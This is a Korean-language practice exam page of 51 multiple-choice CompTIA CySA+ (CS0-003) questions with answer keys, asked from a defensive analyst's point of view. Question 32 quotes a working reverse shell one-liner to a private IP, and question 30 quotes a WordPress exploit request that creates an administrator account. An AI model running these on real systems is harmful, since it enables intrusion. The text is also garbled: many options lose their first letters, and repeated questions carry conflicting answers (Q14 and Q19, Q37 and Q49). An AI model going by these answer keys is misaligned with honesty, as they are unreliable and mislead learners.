아무것도 놓치고 싶지 않으신가요?

인증 시험 합격 팁

최신 시험 소식 및 할인 정보

전문가가 선별하고 최신 정보를 제공합니다.

예, 뉴스레터를 보내주세요

CS0-003 모의고사를 통해 CompTIA CySA+ 시험에서 합격하기

CySA+ 자격증은 지속적인 보안 모니터링을 통해 사고 탐지, 예방 및 대응을 담당하는 사이버 보안 전문가를 위해 고안되었습니다. 시험 문제는 위협 탐지, 데이터 분석, 취약성 관리 등 CySA+ 인증에 필수적인 광범위한 주제를 다루며, 학습 자료 및 시험 가이드와 같은 유용한 시험 준비 리소스를 제공합니다. 이러한 리소스는 핵심 개념을 더 깊이 이해하고 시험 준비도를 높이는 데 도움이 되도록 세심하게 제작되었습니다. 시험 준비를 더욱 강화하려면 모의 시험을 활용하세요. 이러한 모의 시험은 시험 환경을 재현하여 실제 시험 전에 자신의 지식과 기술을 평가할 수 있습니다. 저희의 지원으로 CompTIA Cybersecurity Analyst (CySA+) CS0-003 시험에 합격하고 자격증을 취득할 수 있습니다.
다른 온라인 시험에 응시하세요

질문 #1
보안 팀이 웹 서버의 XSS를 검토하고 다음 Nmap 검사를 실행합니다.다음 중 검사 결과를 가장 정확하게 설명하는 것은?
A. 및 " 문자의 출력은 시도에 사용된 매개 변수로 사용됩니다
B. 약한 매개변수 ID http://172
C. 약한 매개 변수와 필터링되지 않거나 인코딩되지 않은 문자가 > 및 " 을 안전하지 않은 것으로 전달했습니다
D. 약한 매개변수 및 > 및 " 문자가 반영된 XSS 시도
답변 보기
정답: D
질문 #2
한 회사에서 취약성 관리 프로그램을 구현하는 중인데 보안 팀에 민감한 데이터에 대한 액세스 권한을 부여하는 것에 대해 우려하고 있습니다. 다음 중 가장 정확한 취약성 검사 결과를 제공하면서 시스템에 대한 액세스를 줄이기 위해 구현할 수 있는 검사 방법은 무엇인가요?
A. 증된 네트워크 스캔
B. 시브 스캐닝
C. 이전트 기반 스캔
D. 적 스캐닝
답변 보기
정답: C
질문 #3
사고 대응 팀이 인터넷 중단에 대한 조사를 시작하라는 알림을 받습니다. 인터넷 중단으로 인해 여러 위치의 모든 사용자가 외부 SaaS 리소스에 액세스할 수 없습니다. 팀은 조직이 DDoS 공격의 영향을 받았다고 판단합니다. 다음 중 어떤 로그를 먼저 검토해야 하나요?
A. DN
B. 약점 스캐너
C. NS
D. 서버
답변 보기
정답: C
질문 #4
지리적으로 다양한 인력과 동적 IP를 보유한 회사가 네트워크 트래픽을 줄이면서 취약성 검사 방법을 구현하려고 합니다. 다음 중 이 요구 사항을 가장 잘 충족하는 것은 무엇인가요?
A. 부
B. 이전트 기반
C. 인증
D. 격 증명
답변 보기
정답: B
질문 #5
한 회사에서 취약성 관리 프로그램을 구현하고 온프레미스 환경에서 하이브리드 IaaS 클라우드 환경으로 이전하려고 합니다. 새로운 하이브리드 환경에 대해 다음 중 어떤 영향을 고려해야 하나요?
A. 현재 스캐너를 클라우드로 마이그레이션해야 합니다
B. 라우드 관련 잘못된 구성은 현재 스캐너에서 감지되지 않을 수 있습니다
C. 존 취약점 스캐너는 IaaS 시스템을 스캔할 수 없습니다
D. 라우드 환경의 취약점 스캔은 클라우드에서 수행해야 합니다
답변 보기
정답: B
질문 #6
보안 팀이 보안 이벤트 발생 후 다음 단계를 수행할 사람을 결정하는 데 어려움을 겪은 후 교훈 회의를 진행합니다. 다음 중 이 문제를 해결하기 위해 팀이 만들어야 하는 것은 무엇인가요?
A. 서비스 수준 계약
B. 경 관리 계획
C. 고 대응 계획
D. 해각서
답변 보기
정답: C
질문 #7
인시던트 대응 팀이 중요 서버에서 IoC를 발견했습니다. 팀은 추가 조사를 위해 서버를 격리하고 기술적 증거를 수집해야 합니다. 다음 중 서버를 격리하기 전에 민감한 정보를 보존하기 위해 가장 먼저 수집해야 하는 데이터는 무엇인가요?
A. 드 디스크
B. 본 부팅 파티션
C. 성 파일
D. 우팅 테이블
E. 정 IP 주소
답변 보기
정답: D
질문 #8
분석가가 시스템 문제를 조사하기 위해 인터넷을 사용한 후 서버 풀의 가상 웹 서버가 멀웨어에 감염되었습니다. 서버가 재구축되어 서버 풀에 다시 추가된 후 사용자가 웹사이트에 문제를 보고하여 사이트를 신뢰할 수 없다는 것을 나타냅니다. 다음 중 서버 문제의 원인으로 가장 가능성이 높은 것은 무엇인가요?
A. 서버는 데이터를 안전하게 전송하기 위해 SSL을 사용하도록 구성되었습니다
B. 서버가 클라이언트 연결에 대해 취약한 TLS 프로토콜을 지원하고 있었습니다
C. 악성코드는 풀의 모든 웹 서버를 감염시켰습니다
D. 웹 서버의 디지털 인증서가 자체 서명되었습니다
답변 보기
정답: D
질문 #9
제로데이 명령 인젝션 취약점이 발표되었습니다. 보안 관리자가 다음 로그를 분석하여 공격자가 이 취약점을 악용하려는 증거를 찾고 있습니다.다음 중 악용 시도의 증거가 되는 로그 항목은?
A. 그 항목 1
B. 그 항목 2
C. 그 항목 3
D. 그 항목 4
답변 보기
정답: A
질문 #10
사이버 보안 팀장이 주간 경영진 브리핑에서 발표할 지표를 개발하고 있습니다. 경영진은 네트워크에 침입한 멀웨어의 확산을 막는 데 걸리는 시간을 알고 싶어합니다. 다음 중 팀장이 브리핑에 포함해야 하는 지표는 무엇인가요?
A. 균 장애 간격 시간
B. 균 탐지 시간
C. 균 해결 시간
D. 균 포함 시간
답변 보기
정답: D
질문 #11
사이버 보안 분석가가 회사가 거래하지 않는 국가에서 비정상적인 네트워크 스캔 활동을 발견했습니다. 다음 중 가장 좋은 방어 기법은 무엇인가요?
A. 위반 소스 국가를 지역 차단합니다
B. 트워크 방화벽에서 스캔의 IP 범위를 차단합니다
C. 거 트렌드 분석을 수행하여 유사한 스캔 활동을 찾아보세요
D. 트워크 방화벽에서 스캔의 특정 IP 주소를 차단합니다
답변 보기
정답: B
질문 #12
다음 중 사이버 킬 체인에서 공격자가 성공적으로 익스플로잇된 표적과 통신을 시도하는 단계는 어느 것입니까?
A. 명령 및 제어
B. 표에 대한 조치
C. 취
D. elivery
답변 보기
정답: A
질문 #13
사고 대응 팀이 중대한 보안 사고에 대한 대응을 마쳤습니다. 경영진이 수석 분석가에게 교훈을 포함한 사후 조치 보고서를 제출해 달라고 요청했습니다. 다음 중 교훈을 포함해야 할 가능성이 가장 높은 이유는 무엇인가요?
A. 인시던트 보고에 대한 규제 요건을 충족하기 위해
B. 른 부서에 책임을 묻기 위해
C. 고 대응 프로세스에서 개선이 필요한 부분을 파악하기 위해
D. 직의 사고 대응 팀의 주목할 만한 관행을 강조하기 위해
답변 보기
정답: C
질문 #14
한 조직의 최고 경영자는 최근 패치가 출시된 지 약 45일 후에 업계에서 새로운 공격에 대한 악용이 발생하고 있다는 소식을 들었습니다. 다음 중 이 조직을 가장 잘 보호할 수 있는 방법은 무엇인가요?
A. 균 30일의 해결 시간
B. 평균 탐지 시간 45일
C. 균 응답 시간 15일
D. 사 애플리케이션 테스트
답변 보기
정답: A
질문 #15
악용 가능성이 높은 두 가지 취약점에 대한 패치가 같은 금요일 오후에 릴리스되었습니다. 시스템 및 취약점에 대한 정보는 아래 표에 나와 있습니다.다음 중 보안 분석가가 해결을 위해 우선순위를 정해야 하는 것은 무엇인가요?
A. ogers
B. rady
C. rees
D. anning
답변 보기
정답: B
질문 #16
웹 서버 로그를 검토하던 중 분석가가 타임스탬프가 동일한 여러 항목이 있지만 모두 요청 줄에 홀수 문자가 포함되어 있는 것을 발견합니다. 다음 중 어떤 단계를 수행해야 하나요?
A. 즉시 네트워크를 종료하고 다음 지휘 계통의 사람에게 연락하세요
B. 홀수 문자가 어떤 공격을 나타내는지 파악합니다
C. 바른 공격 프레임워크를 활용하고 사고 대응을 어떻게 구성할지 결정합니다
D. 고 대응을 위해 현지 법 집행 기관에 알립니다
답변 보기
정답: B
질문 #17
사고 발생 시 분석가는 추후 조사를 위해 증거를 수집해야 합니다. 다음 중 컴퓨터 시스템의 변동성 수준과 관련하여 가장 먼저 수집해야 하는 것은 무엇인가요?
A. 스크 내용
B. 업 데이터
C. 시 파일
D. 행 중인 프로세스
답변 보기
정답: D
질문 #18
한 보안 분석가가 동일한 국가의 IP 주소를 식별하기 위해 셸 스크립트를 작성하고 있습니다. 다음 중 분석가가 목표를 달성하는 데 도움이 되는 함수는 무엇인가요?
A. unction w() { info=$(ping -c 1 $1 | awk -F "/" 'END{print $1}') && echo "$1 | $info" }
B. unction x() { info=$(geoiplookup $1) && echo "$1 | $info" }
C. unction y() { info=$(dig -x $1 | grep PTR | tail -n 1 ) && echo "$1 | $info" }
D. unction z() { info=$(traceroute -m 40 $1 | awk 'END{print $1}') && echo "$1 | $info" }
답변 보기
정답: B
질문 #19
한 조직의 최고 경영자는 최근 패치가 출시된 지 약 45일 후에 업계에서 새로운 공격에 대한 악용이 발생하고 있다는 소식을 들었습니다. 다음 중 이 조직을 가장 잘 보호할 수 있는 방법은 무엇인가요?
A. 균 30일의 해결 시간
B. 평균 탐지 시간 45일
C. 균 응답 시간 15일
D. 사 애플리케이션 테스트
답변 보기
정답: C
질문 #20
취약점 점수가 7.1점이었던 이전 CVE가 랜섬웨어를 전달하는 데 널리 사용되는 익스플로잇으로 인해 9.8점으로 상승했습니다. 다음 중 분석가가 이 에스컬레이션의 원인으로 가장 가능성이 높은 요인은 무엇인가요?
A. 위
B. 기화
C. VSS
D. 산 가치
답변 보기
정답: B
질문 #21
직원이 웹사이트에 접속하여 디바이스가 침입형 멀웨어에 감염되었습니다. 초기 증거 로그 생성. 디바이스의 무선 어댑터 비활성화. 접속한 웹사이트를 식별할 수 없는 직원 면담. 웹 프록시 트래픽 로그 검토.감염된 디바이스를 치료하기 위해 분석가가 해야 할 일은 다음 중 어느 것인가요?
A. 시스템 펌웨어를 업데이트하고 하드웨어를 다시 이미지화합니다
B. 분석가에게 이메일 알림을 전송하는 추가 멀웨어 스캐너를 설치합니다
C. 인터넷 액세스를 위해 프록시 서버를 사용하도록 시스템을 구성합니다
D. 사용자 프로필을 삭제하고 백업에서 데이터를 복원합니다
답변 보기
정답: A
질문 #22
보안 분석가는 각 시스템이 호스팅하는 콘텐츠의 민감도에 따라 조직 전체의 시스템을 보호해야 합니다. 분석가는 각 시스템 소유자와 협력하여 호스팅되는 데이터의 기밀성, 가용성 및 무결성을 증진하기 위한 최상의 방법론을 결정하는 데 도움을 주고 있습니다. 다음 중 보안 분석가가 각 시스템을 분류하고 우선순위를 정하기 위해 가장 먼저 수행해야 하는 작업은 무엇인가요?
A. 이러한 시스템에 액세스하는 사용자를 인터뷰합니다
B. 시스템을 스캔하여 현재 존재하는 취약점을 확인합니다
C. 급업체별 제로데이 익스플로잇에 대한 알림을 구성합니다
D. 각 시스템의 자산 가치를 결정합니다
답변 보기
정답: D
질문 #23
회사의 사용자 계정이 유출되었습니다. 또한 사용자들은 회사의 내부 포털이 때때로 HTTP를 통해서만 접속할 수 있고, 다른 경우에는 HTTPS를 통해서도 접속할 수 있다고 보고하고 있습니다. 다음 중 관찰된 활동을 가장 잘 설명하는 것은 무엇인가요?
A. SL 인증서에 문제가 있어 포트 443을 HTTPS 접속에 사용할 수 없게 되었습니다
B. 부 액세스 권한을 가진 누군가가 사용자를 포트 80으로 강제 접속시키는 온패스 공격을 수행 중입니다
C. 서버는 증가하는 HTTPS 요청을 처리할 수 없으므로 사용자를 포트 80으로 전달합니다
D. 사 내부 라우터에 새로운 규칙이 적용되어 BGP에서 오류가 발생했습니다
답변 보기
정답: B
질문 #24
연휴 기간 동안 한 회사에서 보안 사고가 발생했습니다. 이 정보는 적시에 적절한 담당자에게 적절하게 전달되었고 서버는 최신 상태로 유지되었으며 적절한 감사 및 로깅을 통해 구성되었습니다. 최고 정보 보안 책임자는 정확히 어떤 일이 일어났는지 알고 싶어합니다. 다음 중 분석가가 가장 먼저 취해야 할 조치는 무엇인가요?
A. 렌식 분석을 위한 가상 서버 복제
B. og m을 영향을 받는 서버로 전송하고 로그 분석을 시작합니다
C. 마지막으로 알려진 정상 백업에서 복원하여 연결이 끊어지지 않았는지 확인합니다
D. 향을 받는 서버를 즉시 종료합니다
답변 보기
정답: A
질문 #25
클라우드 팀이 승인되지 않은 리소스가 자동 프로비저닝되고 있다는 경고를 받았습니다. 조사 후, 팀은 크립토마이닝이 발생하고 있다고 의심합니다. 다음 중 팀이 이러한 결론을 내릴 가능성이 가장 높은 지표는 무엇인가요?
A. 높은 GPU 활용도
B. 대역폭 소비
C. 무단 변경
D. 비정상적인 트래픽 급증
답변 보기
정답: A
질문 #26
다음 중 보안 분석가가 조직의 서로 다른 알려진 공격자들 간의 TTP를 비교할 때 가장 많이 사용하는 것은 무엇인가요?
A. ITRE ATT&CK
B. 이버 킬 참
C. WASP
D. TIX/TAXII
답변 보기
정답: A
질문 #27
한 조직의 신입 사원이 개인 기기 사용을 금지하는 회사 정책에도 불구하고 지속적으로 개인 웹캠을 연결하고 있습니다. SOC 관리자는 신입 직원이 회사 정책을 인지하지 못하고 있음을 발견합니다. 다음 중 SOC 관리자가 신입 사원이 회사 정책을 책임감 있게 따르도록 하기 위해 가장 추천할 만한 것은 무엇인가요?
A. 인사팀은 모든 신입 직원에게 사용자 계약서 사본을 이메일로 보내야 합니다
B. 독자는 신입 직원으로부터 사용자 계약을 읽었음을 구두로 확인받아야 합니다
C. 든 신입사원은 온보딩 과정에서 회사 보안 정책에 대한 테스트를 받아야 합니다
D. 든 신입 직원은 회사 보안 정책을 인정하는 사용자 계약서에 서명해야 합니다
답변 보기
정답: D
질문 #28
한 보안 분석가가 동일한 회사 및 지역에 속한 여러 소스 네트워크에서 가능한 네트워크 주소를 식별하려고 합니다. 다음 중 이 목표를 달성하는 데 도움이 될 수 있는 셸 스크립트 함수는 무엇인가요?
A. unction w() { a=$(ping -c 1 $1 | awk-F "/" 'END{print $1}') && echo "$1 | $a" }
B. unction x() { b=traceroute -m 40 $1 | awk 'END{print $1}') && echo "$1 | $b" }
C. unction y() { dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F "
D. unction z() { c=$(geoiplookup$1) && echo "$1 | $c" }
답변 보기
정답: C
질문 #29
기술자가 서버의 취약점을 파악하고 소프트웨어 패치를 적용합니다. 다음 중 문제 해결 프로세스의 다음 단계로 진행해야 하는 것은 무엇인가요?
A. 스트
B. 현
C. 효성 검사
D. 백
답변 보기
정답: C
질문 #30
분석가가 악의적인 것으로 알려진 IP 주소가 여러 웹 서버에서 제로데이 취약점을 익스플로잇하려고 시도했다는 내용의 IPS 이벤트 알림을 SIEM으로부터 받았습니다. 익스플로잇에는 다음 코드 조각이 포함되어 있습니다./wp-json/trx_addons/V2/get/sc_layout?sc=wp_insert_user&role=administrator다음 중 이 코드 조각으로 표시된 공격을 완화하는 데 가장 효과적인 제어는 무엇인가요?
A. 사용자 생성을 관리자로만 제한합니다
B. 레이아웃 생성을 관리자만 할 수 있도록 제한합니다
C. 모든 사용자에 대해 trx_addons 디렉토리를 읽기 전용으로 설정합니다
D. 모든 사용자에 대해 V2 디렉터리를 읽기 전용으로 설정합니다
답변 보기
정답: A
질문 #31
다음 중 SIEM, SOAR 및 티켓팅 시스템에 대한 최근의 투자를 고려할 때 조직이 집중해야 할 가장 좋은 메트릭은 무엇인가요?
A. 균 탐지 시간
B. 술별 익스플로잇 건수
C. 고 볼륨
D. 입 시도 횟수
답변 보기
정답: A
질문 #32
보안 분석가가 다음 명령이 포함된 익스플로잇 시도를 탐지했습니다.sh -i >& /dev/udp/10.1.1.1/4821 0>$l다음 중 어느 것이 시도되고 있습니까?
A. CE
B. 버스 셸
C. SS
D. QL 주입
답변 보기
정답: B
질문 #33
한 보안 분석가가 여러 개의 표적 Windows 멀웨어 바이너리와 관련된 조사를 수행 중입니다. 분석가는 공격자에게 정보를 공개하지 않고 인텔리전스를 수집하려고 합니다. 다음 중 분석가가 목표를 달성할 수 있는 작업은 무엇인가요?
A. 분석을 위해 에어 갭 샌드박스에 바이너리를 업로드합니다
B. 바이너리를 안티바이러스 공급업체에 보내기
C. 터넷 연결이 가능한 환경에서 바이너리를 실행합니다
D. irusTotal을 사용하여 파일 해시 쿼리하기
답변 보기
정답: A
질문 #34
한 보안 분석가가 동일한 회사 및 지역에 속한 여러 소스 네트워크에서 가능한 네트워크 주소를 식별하려고 합니다. 다음 중 이 목표를 달성하는 데 도움이 될 수 있는 셸 스크립트 함수는 무엇인가요?
A. 함수 w() { a=$(ping -c 1 $1 | awk-F "/" 'END{print $1}') && echo "$1 | $a" }
B. 함수 x() { b=traceroute -m 40 $1 | awk 'END{print $1}') && echo "$1 | $b" }
C. 함수 y() { dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F "
D. 함수 z() { c=$(geoiplookup$1) && echo "$1 | $c" }
답변 보기
정답: C
질문 #35
다음 중 사람의 개입을 최소화하고 보안 운영의 프로세스 개선에 도움이 될 수 있는 것은 무엇인가요?
A. SSTMM
B. IEM
C. OAR
D. WASP
답변 보기
정답: C
질문 #36
분석가가 헤더에 추가 문자가 포함된 HTTPS 트래픽을 다른 국가의 알려진 악성 IP로 전송하는 내부 디바이스가 있음을 발견했습니다. 다음 중 분석가가 발견한 내용을 설명하는 것은 무엇인가요?
A. 콘
B. 차 사이트 스크립팅
C. 퍼 오버플로
D. HP 트래버스
답변 보기
정답: A
질문 #37
보안 분석가가 최근 환경의 단일 웹 서버에 대해 수행한 취약성 평가에서 다음과 같은 결과 표를 얻었습니다. 다음 중 발견 사항을 해결하기 위해 가장 먼저 완료해야 하는 것은 무엇입니까?
A. 웹 개발팀에 페이지 콘텐츠 업데이트를 요청하세요
B. 어판 액세스를 위한 IP 주소 허용 목록 추가하기
C. 뢰할 수 있는 루트 CA에서 적절한 인증서를 구매합니다
D. 든 필드에서 적절한 소독을 수행합니다
답변 보기
정답: D
질문 #38
보안 분석가는 보안 검사 중에 중요한 애플리케이션에서 동일한 취약점을 정기적으로 발견합니다. 다음 중 SDLC 단계에 적용할 경우 이 문제를 가장 잘 완화할 수 있는 권장 사항은 무엇인가요?
A. 독점 시스템
B. 거시 시스템
C. 원되지 않는 운영 체제
D. 지보수 기간 부족
답변 보기
정답: C
질문 #39
조사를 시작할 때 다음 중 가장 먼저 수행해야 하는 작업은 무엇인가요?
A. 집행 기관에 알리기
B. 면 보안
C. 든 관련 증거 압수
D. 인 인터뷰
답변 보기
정답: B
질문 #40
다음 중 자동화에 적합한 보안 운영 작업은 무엇인가요?
A. 의심스러운 파일 분석: 폴더에서 의심스러운 그래픽을 찾고, 발견된 그래픽의 카테고리에 따라 원본 폴더에 하위 폴더를 생성하고, 의심스러운 그래픽을 적절한 하위 폴더로 이동합니다
B. 화벽 IoC 차단 조치: 가장 최근에 발표된 제로데이 익스플로잇의 IoC에 대한 방화벽 로그 검토로그에서 발견된 행위를 차단하기 위해 방화벽에서 완화 조치를 취합니다블록 규칙으로 인해 발생한 오탐에 대한 후속 조치를 취합니다
C. 안 애플리케이션 사용자 오류: 오류 로그에서 보안 애플리케이션에 문제가 있는 사용자의 징후를 검색합니다사용자의 전화번호를 조회합니다사용자에게 전화하여 애플리케이션 사용에 대한 질문이 있으면 도움을 요청합니다
D. 메일 헤더 분석: 이메일 헤더에서 피싱 신뢰도 지표가 5 이상인지 확인발신자의 도메인을 차단 목록에 추가이메일을 검역소로 이동합니다
답변 보기
정답: D
질문 #41
보안 분석가가 손상되었을 가능성이 있는 컴퓨터의 FTP 세션이 포함된 패킷 캡처를 Wireshark에서 검토하고 있습니다. 분석가는 다음과 같은 표시 필터를 설정합니다: ftp. 분석가는 226 전송 완료 응답이 있는 여러 개의 RETR 요청이 있음을 알 수 있지만 패킷 목록 창에는 파일 전송 자체가 포함된 패킷이 표시되지 않습니다. 다음 중 분석가가 다운로드한 파일의 전체 내용을 보기 위해 수행할 수 있는 작업은 무엇인가요?
A. 스플레이 필터를 ftp
B. 스플레이 필터를 tcp
C. 스플레이 필터를 ftp-data로 변경하고 TCP 스트림을 따라갑니다
D. 일 메뉴로 이동하여 개체 내보내기 옵션에서 FTP를 선택합니다
답변 보기
정답: C
질문 #42
한 조직에서 회사 웹 사이트에 대한 웹 애플리케이션 취약성 평가를 수행한 결과 다음과 같은 결과가 관찰되었습니다. 다음 중 보안 분석가가 공유해야 하는 튜닝 권장 사항은 무엇인가요?
A. TTPS로 통신을 강제하려면 HttpOnly 플래그를 설정합니다
B. -Frame-Options 헤더가 없는 요청 차단
C. 한이 부여된 도메인에 Access-Control-Allow-Origin 헤더를 구성합니다
D. 차 출처 리소스 공유 헤더 비활성화하기
답변 보기
정답: C
질문 #43
사이버 보안 분석가가 회사가 거래하지 않는 국가에서 비정상적인 네트워크 스캔 활동을 발견했습니다. 다음 중 가장 좋은 방어 기법은 무엇인가요?
A. 문제를 일으킨 소스 국가를 지역 차단합니다
B. 네트워크 방화벽에서 스캔의 IP 범위를 차단합니다
C. 과거 트렌드 분석을 수행하여 유사한 스캔 활동을 찾습니다
D. 네트워크 방화벽에서 스캔의 특정 IP 주소를 차단합니다
답변 보기
정답: B
질문 #44
한 보안 프로그램은 보안 제어를 SIEM에 통합하여 MTTR을 30% 개선할 수 있었습니다. 분석가는 더 이상 여러 도구를 돌아다닐 필요가 없었습니다. 다음 중 이 보안 프로그램이 한 일을 가장 잘 설명하는 것은 무엇인가요?
A. 데이터 강화
B. 안 컨트롤 플레인
C. 협 피드 조합
D. 일 유리창
답변 보기
정답: D
질문 #45
다음 중 조직 외부로 PII가 노출되는 것을 방지하는 데 가장 효과적인 도구는 무엇인가요?
A. AM
B. DS
C. KI
D. LP
답변 보기
정답: D
질문 #46
회사의 보안팀에서 리소스의 부적절한 사용(예: 사무실 내 워크스테이션에 크립토마이너를 설치하는 직원)과 관련된 신고 정책의 섹션을 업데이트하고 있습니다. 업계 모범 사례를 준수하기 위해 보안팀 외에 다음 중 어느 그룹에 먼저 문제를 에스컬레이션해야 하나요?
A. 프 데스크
B. 집행
C. 무 부서
D. 사회 멤버
답변 보기
정답: C
질문 #47
조직에서 고객 거래에 대한 침해가 발생했습니다. PCI DSS 약관에 따라 조직은 다음 중 어느 그룹에 침해 사실을 보고해야 하나요?
A. CI 보안 표준 위원회
B. 지 법 집행 기관
C. 방 법 집행 기관
D. 드 발급자
답변 보기
정답: D
질문 #48
보안 분석가는 해결해야 할 취약점의 우선순위를 정하는 임무를 맡고 있습니다. 관련 회사 보안 정책은 다음과 같습니다:보안 정책 1006: 취약점 관리1. 회사는 CVSSv3.1 기본 점수 지표(악용 가능성 및 영향)를 사용하여 보안 취약점의 수정 우선순위를 정합니다.2. 회사는 기밀성과 가용성 사이에서 선택해야 하는 상황에서 시스템 및 데이터의 가용성보다 데이터의 기밀성을 우선시합니다.3. 컴
A. ame: THOR
B. ame: CAP
C. ame: LOKI
D. ame: THANOS
답변 보기
정답: B
질문 #49
보안 분석가가 최근 환경의 단일 웹 서버에 대해 수행한 취약성 평가에서 다음과 같은 결과 표를 얻었습니다. 다음 중 발견 사항을 해결하기 위해 가장 먼저 완료해야 하는 것은 무엇입니까?
A. 웹 개발팀에 페이지 콘텐츠 업데이트를 요청하세요
B. 제어판 액세스를 위한 IP 주소 허용 목록 추가하기
C. 신뢰할 수 있는 루트 CA에서 적절한 인증서를 구매합니다
D. 모든 필드에서 적절한 소독을 수행합니다
답변 보기
정답: C
질문 #50
한 사용자가 멀웨어가 포함된 소프트웨어를 컴퓨터에 다운로드하여 결국 다른 여러 시스템을 감염시킵니다. 이 사용자는 다음 중 어떤 상태가 되었나요?
A. 핵티비스트
B. 지능형 지속적 위협
C. 내부자 위협
D. 스크립트 키디
답변 보기
정답: D
질문 #51
보안 분석가는 소송 요청에 연루된 시스템 하드 드라이브를 보존해야 합니다. 다음 중 장치의 데이터가 수정되지 않도록 보장하는 가장 좋은 방법은 무엇인가요?
A. 해시값을 생성하고 백업 이미지를 만듭니다
B. 데이터의 기밀성을 보장하기 위해 장치를 암호화합니다
C. 잡한 비밀번호로 장치를 보호하세요
D. 모리 스캔 덤프를 수행하여 잔여 데이터를 수집합니다
답변 보기
정답: A

제출 후 답변 보기

질문에 대한 답변을 얻으려면 이메일과 WhatsApp을 제출하세요.

참고: 올바른 시험 결과를 얻을 수 있도록 이메일 ID와 Whatsapp이 유효한지 확인하십시오.

이메일:
WhatsApp/전화번호: